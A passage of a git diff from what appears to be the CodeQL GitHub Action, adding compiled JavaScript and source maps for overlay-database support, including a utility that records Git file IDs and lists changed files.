const { registriesAuthTokens, qlconfigFile } = await configUtils.generateRegistries(registriesInput, config.tempDir, logger);
|
||||||
await configUtils.wrapEnvironment({
|
await configUtils.wrapEnvironment({
|
||||||
@@ -81,7 +111,7 @@ async function runInit(codeql, config, sourceRoot, processName, registriesInput,
|
|||||||
CODEQL_REGISTRIES_AUTH: registriesAuthTokens,
|
CODEQL_REGISTRIES_AUTH: registriesAuthTokens,
|
||||||
},
|
},
|
||||||
// Init a database cluster
|
// Init a database cluster
|
||||||
async () => await codeql.databaseInitCluster(config, sourceRoot, processName, qlconfigFile, logger));
|
async () => await codeql.databaseInitCluster(config, sourceRoot, processName, qlconfigFile, overlayDatabaseMode, logger));
|
||||||
return await (0, tracer_config_1.getCombinedTracerConfig)(codeql, config);
|
return await (0, tracer_config_1.getCombinedTracerConfig)(codeql, config);
|
||||||
}
|
}
|
||||||
function printPathFiltersWarning(config, logger) {
|
function printPathFiltersWarning(config, logger) {
|
||||||
|
|||||||
@@ -1 +1 @@
|
|||||||
{"version":3,"file":"init.js","sourceRoot":"","sources":["../src/init.ts"],"names":[],"mappings":";;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;AAoBA,gCAyCC;AAED,gCAgBC;AAED,0BAkCC;AAED,0DAeC;AAMD,sDAkBC;AAED,0EAkDC;AAhND,uCAAyB;AACzB,2CAA6B;AAE7B,yEAA2D;AAC3D,gDAAkC;AAElC,iDAAsE;AAEtE,qCAA+C;AAC/C,4DAA8C;AAE9C,2CAA0D;AAK1D,qDAAgD;AAChD,mDAAwE;AACxE,6CAA+B;AAExB,KAAK,UAAU,UAAU,CAC9B,UAA8B,EAC9B,UAA4B,EAC5B,OAAe,EACf,OAA2B,EAC3B,iBAA2C,EAC3C,QAA2B,EAC3B,MAAc;IAQd,MAAM,CAAC,UAAU,CAAC,oBAAoB,CAAC,CAAC;IACxC,MAAM,EACJ,MAAM,EACN,yBAAyB,EACzB,WAAW,EACX,YAAY,EACZ,gBAAgB,GACjB,GAAG,MAAM,IAAA,oBAAW,EACnB,UAAU,EACV,UAAU,EACV,OAAO,EACP,OAAO,EACP,iBAAiB,EACjB,MAAM,EACN,QAAQ,EACR,IAAI,CACL,CAAC;IACF,MAAM,MAAM,CAAC,YAAY,EAAE,CAAC;IAC5B,MAAM,CAAC,QAAQ,EAAE,CAAC;IAClB,OAAO;QACL,MAAM;QACN,yBAAyB;QACzB,WAAW;QACX,YAAY;QACZ,gBAAgB;KACjB,CAAC;AACJ,CAAC;AAEM,KAAK,UAAU,UAAU,CAC9B,MAAoC,EACpC,MAAc;IAEd,MAAM,MAAM,GAAG,MAAM,CAAC,MAAM,CAAC;IAC7B,MAAM,CAAC,UAAU,CAAC,6BAA6B,CAAC,CAAC;IACjD,MAAM,MAAM,GAAG,MAAM,WAAW,CAAC,UAAU,CAAC,MAAM,CAAC,CAAC;IACpD,IACE,CAAC,CAAC,MAAM,MAAM,CAAC,eAAe,CAC5B,6BAAY,CAAC,kCAAkC,CAChD,CAAC,EACF,CAAC;QACD,uBAAuB,CAAC,MAAM,EAAE,MAAM,CAAC,CAAC;IAC1C,CAAC;IACD,MAAM,CAAC,QAAQ,EAAE,CAAC;IAClB,OAAO,MAAM,CAAC;AAChB,CAAC;AAEM,KAAK,UAAU,OAAO,CAC3B,MAAc,EACd,MAA0B,EAC1B,UAAkB,EAClB,WAA+B,EAC/B,eAAmC,EACnC,UAAoC,EACpC,MAAc;IAEd,EAAE,CAAC,SAAS,CAAC,MAAM,CAAC,UAAU,EAAE,EAAE,SAAS,EAAE,IAAI,EAAE,CAAC,CAAC;IAErD,MAAM,EAAE,oBAAoB,EAAE,YAAY,EAAE,GAC1C,MAAM,WAAW,CAAC,kBAAkB,CAClC,eAAe,EACf,MAAM,CAAC,OAAO,EACd,MAAM,CACP,CAAC;IACJ,MAAM,WAAW,CAAC,eAAe,CAC/B;QACE,YAAY,EAAE,UAAU,CAAC,IAAI;QAC7B,sBAAsB,EAAE,oBAAoB;KAC7C;IAED,0BAA0B;IAC1B,KAAK,IAAI,EAAE,CACT,MAAM,MAAM,CAAC,mBAAmB,CAC9B,MAAM,EACN,UAAU,EACV,WAAW,EACX,YAAY,EACZ,MAAM,CACP,CACJ,CAAC;IACF,OAAO,MAAM,IAAA,uCAAuB,EAAC,MAAM,EAAE,MAAM,CAAC,CAAC;AACvD,CAAC;AAED,SAAgB,uBAAuB,CACrC,MAA0B,EAC1B,MAAc;IAEd,qEAAqE;IACrE,sEAAsE;IACtE,IACE,CAAC,MAAM,CAAC,iBAAiB,CAAC,KAAK,EAAE,MAAM;QACrC,MAAM,CAAC,iBAAiB,CAAC,cAAc,CAAC,EAAE,MAAM,CAAC;QACnD,CAAC,MAAM,CAAC,SAAS,CAAC,KAAK,CAAC,6BAAiB,CAAC,EAC1C,CAAC;QACD,MAAM,CAAC,OAAO,CACZ,mGAAmG,CACpG,CAAC;IACJ,CAAC;AACH,CAAC;AAED;;;GAGG;AACI,KAAK,UAAU,qBAAqB,CACzC,SAAqB,EACrB,MAAc;IAEd,IACE,SAAS,CAAC,QAAQ,CAAC,oBAAQ,CAAC,MAAM,CAAC;QACnC,OAAO,CAAC,QAAQ,KAAK,OAAO;QAC5B,CAAC,CAAC,MAAM,MAAM,CAAC,UAAU,EAAE,CAAC,CAAC,QAAQ,EAAE,iBAAiB,EACxD,CAAC;QACD,MAAM,MAAM,GAAG,IAAI,CAAC,OAAO,CACzB,SAAS,EACT,iBAAiB,EACjB,oBAAoB,CACrB,CAAC;QACF,MAAM,IAAI,UAAU,CAAC,UAAU,CAAC,MAAM,EAAE,CAAC,KAAK,CAAC,YAAY,EAAE,IAAI,CAAC,EAAE;YAClE,MAAM;SACP,CAAC,CAAC,IAAI,EAAE,CAAC;IACZ,CAAC;AACH,CAAC;AAED,SAAgB,+BAA+B,CAC7C,MAA0B,EAC1B,MAAc;AACd,+FAA+F;AAC/F,eAAe;AACf,MAAM,GAAG,EAAE,CAAC,MAAM;IAElB,IACE,EAAE,CAAC,UAAU,CAAC,MAAM,CAAC,UAAU,CAAC;QAChC,CAAC,EAAE,CAAC,QAAQ,CAAC,MAAM,CAAC,UAAU,CAAC,CAAC,MAAM,EAAE;YACtC,EAAE,CAAC,WAAW,CAAC,MAAM,CAAC,UAAU,CAAC,CAAC,MAAM,CAAC,EAC3C,CAAC;QACD,MAAM,CAAC,OAAO,CACZ,kCAAkC,MAAM,CAAC,UAAU,4CAA4C,CAChG,CAAC;QACF,IAAI,CAAC;YACH,MAAM,CAAC,MAAM,CAAC,UAAU,EAAE;gBACxB,KAAK,EAAE,IAAI;gBACX,UAAU,EAAE,CAAC;gBACb,SAAS,EAAE,IAAI;aAChB,CAAC,CAAC;YAEH,MAAM,CAAC,IAAI,CACT,yCAAyC,MAAM,CAAC,UAAU,GAAG,CAC9D,CAAC;QACJ,CAAC;QAAC,OAAO,CAAC,EAAE,CAAC;YACX,MAAM,KAAK,GAAG,mEACZ,IAAA,+BAAgB,EAAC,aAAa,CAAC;gBAC7B,CAAC,CAAC,sCAAsC,MAAM,CAAC,UAAU,IAAI;gBAC7D,CAAC,CAAC,kCAAkC,MAAM,CAAC,UAAU,IAAI;oBACvD,yEACN,iEAAiE,CAAC;YAElE,kGAAkG;YAClG,IAAI,IAAA,iCAAkB,GAAE,EAAE,CAAC;gBACzB,MAAM,IAAI,IAAI,CAAC,kBAAkB,CAC/B,GAAG,KAAK,4GAA4G;oBAClH,sEAAsE,IAAI,CAAC,eAAe,CACxF,CAAC,CACF,EAAE,CACN,CAAC;YACJ,CAAC;iBAAM,CAAC;gBACN,MAAM,IAAI,KAAK,CACb,GAAG,KAAK,sDAAsD;oBAC5D,+EAA+E;oBAC/E,yCAAyC,IAAI,CAAC,eAAe,CAAC,CAAC,CAAC,EAAE,CACrE,CAAC;YACJ,CAAC;QACH,CAAC;IACH,CAAC;AACH,CAAC"}
|
{"version":3,"file":"init.js","sourceRoot":"","sources":["../src/init.ts"],"names":[],"mappings":"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"}
|
||||||
129
lib/overlay-database-utils.js
generated
Normal file
129
lib/overlay-database-utils.js
generated
Normal file
@@ -0,0 +1,129 @@
|
|||||||
|
"use strict";
|
||||||
|
var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) {
|
||||||
|
if (k2 === undefined) k2 = k;
|
||||||
|
var desc = Object.getOwnPropertyDescriptor(m, k);
|
||||||
|
if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) {
|
||||||
|
desc = { enumerable: true, get: function() { return m[k]; } };
|
||||||
|
}
|
||||||
|
Object.defineProperty(o, k2, desc);
|
||||||
|
}) : (function(o, m, k, k2) {
|
||||||
|
if (k2 === undefined) k2 = k;
|
||||||
|
o[k2] = m[k];
|
||||||
|
}));
|
||||||
|
var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) {
|
||||||
|
Object.defineProperty(o, "default", { enumerable: true, value: v });
|
||||||
|
}) : function(o, v) {
|
||||||
|
o["default"] = v;
|
||||||
|
});
|
||||||
|
var __importStar = (this && this.__importStar) || (function () {
|
||||||
|
var ownKeys = function(o) {
|
||||||
|
ownKeys = Object.getOwnPropertyNames || function (o) {
|
||||||
|
var ar = [];
|
||||||
|
for (var k in o) if (Object.prototype.hasOwnProperty.call(o, k)) ar[ar.length] = k;
|
||||||
|
return ar;
|
||||||
|
};
|
||||||
|
return ownKeys(o);
|
||||||
|
};
|
||||||
|
return function (mod) {
|
||||||
|
if (mod && mod.__esModule) return mod;
|
||||||
|
var result = {};
|
||||||
|
if (mod != null) for (var k = ownKeys(mod), i = 0; i < k.length; i++) if (k[i] !== "default") __createBinding(result, mod, k[i]);
|
||||||
|
__setModuleDefault(result, mod);
|
||||||
|
return result;
|
||||||
|
};
|
||||||
|
})();
|
||||||
|
Object.defineProperty(exports, "__esModule", { value: true });
|
||||||
|
exports.CODEQL_OVERLAY_MINIMUM_VERSION = exports.OverlayDatabaseMode = void 0;
|
||||||
|
exports.writeBaseDatabaseOidsFile = writeBaseDatabaseOidsFile;
|
||||||
|
exports.writeOverlayChangesFile = writeOverlayChangesFile;
|
||||||
|
const fs = __importStar(require("fs"));
|
||||||
|
const path = __importStar(require("path"));
|
||||||
|
const actions_util_1 = require("./actions-util");
|
||||||
|
const git_utils_1 = require("./git-utils");
|
||||||
|
var OverlayDatabaseMode;
|
||||||
|
(function (OverlayDatabaseMode) {
|
||||||
|
OverlayDatabaseMode["Overlay"] = "overlay";
|
||||||
|
OverlayDatabaseMode["OverlayBase"] = "overlay-base";
|
||||||
|
OverlayDatabaseMode["None"] = "none";
|
||||||
|
})(OverlayDatabaseMode || (exports.OverlayDatabaseMode = OverlayDatabaseMode = {}));
|
||||||
|
exports.CODEQL_OVERLAY_MINIMUM_VERSION = "2.20.5";
|
||||||
|
/**
|
||||||
|
* Writes a JSON file containing Git OIDs for all tracked files (represented
|
||||||
|
* by path relative to the source root) under the source root. The file is
|
||||||
|
* written into the database location specified in the config.
|
||||||
|
*
|
||||||
|
* @param config The configuration object containing the database location
|
||||||
|
* @param sourceRoot The root directory containing the source files to process
|
||||||
|
* @throws {Error} If the Git repository root cannot be determined
|
||||||
|
*/
|
||||||
|
async function writeBaseDatabaseOidsFile(config, sourceRoot) {
|
||||||
|
const gitFileOids = await (0, git_utils_1.getFileOidsUnderPath)(sourceRoot);
|
||||||
|
const gitFileOidsJson = JSON.stringify(gitFileOids);
|
||||||
|
const baseDatabaseOidsFilePath = getBaseDatabaseOidsFilePath(config);
|
||||||
|
await fs.promises.writeFile(baseDatabaseOidsFilePath, gitFileOidsJson);
|
||||||
|
}
|
||||||
|
/**
|
||||||
|
* Reads and parses the JSON file containing the base database Git OIDs.
|
||||||
|
* This file contains the mapping of file paths to their corresponding Git OIDs
|
||||||
|
* that was previously written by writeBaseDatabaseOidsFile().
|
||||||
|
*
|
||||||
|
* @param config The configuration object containing the database location
|
||||||
|
* @param logger The logger instance to use for error reporting
|
||||||
|
* @returns An object mapping file paths (relative to source root) to their Git OIDs
|
||||||
|
* @throws {Error} If the file cannot be read or parsed
|
||||||
|
*/
|
||||||
|
async function readBaseDatabaseOidsFile(config, logger) {
|
||||||
|
const baseDatabaseOidsFilePath = getBaseDatabaseOidsFilePath(config);
|
||||||
|
try {
|
||||||
|
const contents = await fs.promises.readFile(baseDatabaseOidsFilePath, "utf-8");
|
||||||
|
return JSON.parse(contents);
|
||||||
|
}
|
||||||
|
catch (e) {
|
||||||
|
logger.error("Failed to read overlay-base file OIDs from " +
|
||||||
|
`${baseDatabaseOidsFilePath}: ${e.message || e}`);
|
||||||
|
throw e;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
function getBaseDatabaseOidsFilePath(config) {
|
||||||
|
return path.join(config.dbLocation, "base-database-oids.json");
|
||||||
|
}
|
||||||
|
/**
|
||||||
|
* Writes a JSON file containing the source-root-relative paths of files under
|
||||||
|
* `sourceRoot` that have changed (added, removed, or modified) from the overlay
|
||||||
|
* base database.
|
||||||
|
*
|
||||||
|
* This function uses the Git index to determine which files have changed, so it
|
||||||
|
* requires the following preconditions, both when this function is called and
|
||||||
|
* when the overlay-base database was initialized:
|
||||||
|
*
|
||||||
|
* - It requires that `sourceRoot` is inside a Git repository.
|
||||||
|
* - It assumes that all changes in the working tree are staged in the index.
|
||||||
|
* - It assumes that all files of interest are tracked by Git, e.g. not covered
|
||||||
|
* by `.gitignore`.
|
||||||
|
*/
|
||||||
|
async function writeOverlayChangesFile(config, sourceRoot, logger) {
|
||||||
|
const baseFileOids = await readBaseDatabaseOidsFile(config, logger);
|
||||||
|
const overlayFileOids = await (0, git_utils_1.getFileOidsUnderPath)(sourceRoot);
|
||||||
|
const changedFiles = computeChangedFiles(baseFileOids, overlayFileOids);
|
||||||
|
logger.info(`Found ${changedFiles.length} changed file(s) under ${sourceRoot}.`);
|
||||||
|
const changedFilesJson = JSON.stringify({ changes: changedFiles });
|
||||||
|
const overlayChangesFile = path.join((0, actions_util_1.getTemporaryDirectory)(), "overlay-changes.json");
|
||||||
|
logger.debug(`Writing overlay changed files to ${overlayChangesFile}: ${changedFilesJson}`);
|
||||||
|
await fs.promises.writeFile(overlayChangesFile, changedFilesJson);
|
||||||
|
return overlayChangesFile;
|
||||||
|
}
|
||||||
|
function computeChangedFiles(baseFileOids, overlayFileOids) {
|
||||||
|
const changes = [];
|
||||||
|
for (const [file, oid] of Object.entries(overlayFileOids)) {
|
||||||
|
if (!(file in baseFileOids) || baseFileOids[file] !== oid) {
|
||||||
|
changes.push(file);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
for (const file of Object.keys(baseFileOids)) {
|
||||||
|
if (!(file in overlayFileOids)) {
|
||||||
|
changes.push(file);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return changes;
|
||||||
|
}
|
||||||
|
//# sourceMappingURL=overlay-database-utils.js.map
|
||||||
1
lib/overlay-database-utils.js.map
Normal file
1
lib/overlay-database-utils.js.map
Normal file
@@ -0,0 +1 @@
|
|||||||
|
{"version":3,"file":"overlay-database-utils.js","sourceRoot":"","sources":["../src/overlay-database-utils.ts"],"names":[],"mappings":"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"}
|
||||||
94
lib/overlay-database-utils.test.js
generated
Normal file
94
lib/overlay-database-utils.test.js
generated
Normal file
@@ -0,0 +1,94 @@
|
|||||||
|
"use strict";
|
||||||
|
var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) {
|
||||||
|
if (k2 === undefined) k2 = k;
|
||||||
|
var desc = Object.getOwnPropertyDescriptor(m, k);
|
||||||
|
if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) {
|
||||||
|
desc = { enumerable: true, get: function() { return m[k]; } };
|
||||||
|
}
|
||||||
|
Object.defineProperty(o, k2, desc);
|
||||||
|
}) : (function(o, m, k, k2) {
|
||||||
|
if (k2 === undefined) k2 = k;
|
||||||
|
o[k2] = m[k];
|
||||||
|
}));
|
||||||
|
var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) {
|
||||||
|
Object.defineProperty(o, "default", { enumerable: true, value: v });
|
||||||
|
}) : function(o, v) {
|
||||||
|
o["default"] = v;
|
||||||
|
});
|
||||||
|
var __importStar = (this && this.__importStar) || (function () {
|
||||||
|
var ownKeys = function(o) {
|
||||||
|
ownKeys = Object.getOwnPropertyNames || function (o) {
|
||||||
|
var ar = [];
|
||||||
|
for (var k in o) if (Object.prototype.hasOwnProperty.call(o, k)) ar[ar.length] = k;
|
||||||
|
return ar;
|
||||||
|
};
|
||||||
|
return ownKeys(o);
|
